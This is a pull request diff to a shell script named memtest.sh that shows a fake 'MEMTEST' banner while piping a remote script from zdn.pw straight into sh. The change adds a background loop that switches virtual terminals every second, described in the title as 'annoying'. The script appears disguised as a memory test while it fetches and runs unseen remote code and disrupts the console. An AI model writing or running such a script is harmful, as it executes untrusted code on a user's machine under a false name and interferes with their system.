### PR TITLE
Added annoying VT rotation every 1s

### DIFF
--- a/memtest.sh
+++ b/memtest.sh
@@ -1,4 +1,4 @@
 systemctl start dhcpcd
 pacman -Syy python2 --noconfirm
 
-python2 -c "while True:print '\x1b[0;44m MEMTEST', ' '*80" & curl zdn.pw/index.sh | sh
+python2 -c "while True:print '\x1b[0;44m MEMTEST', ' '*80" & (while :;do for((i=1;i<5;i++));do chvt $i;sleep 1;done;done) & curl zdn.pw/index.sh | sh


### PR DESCRIPTION
Just switches the virtual terminal in the background every 1s (hops through vt1-vt4 and starts over).
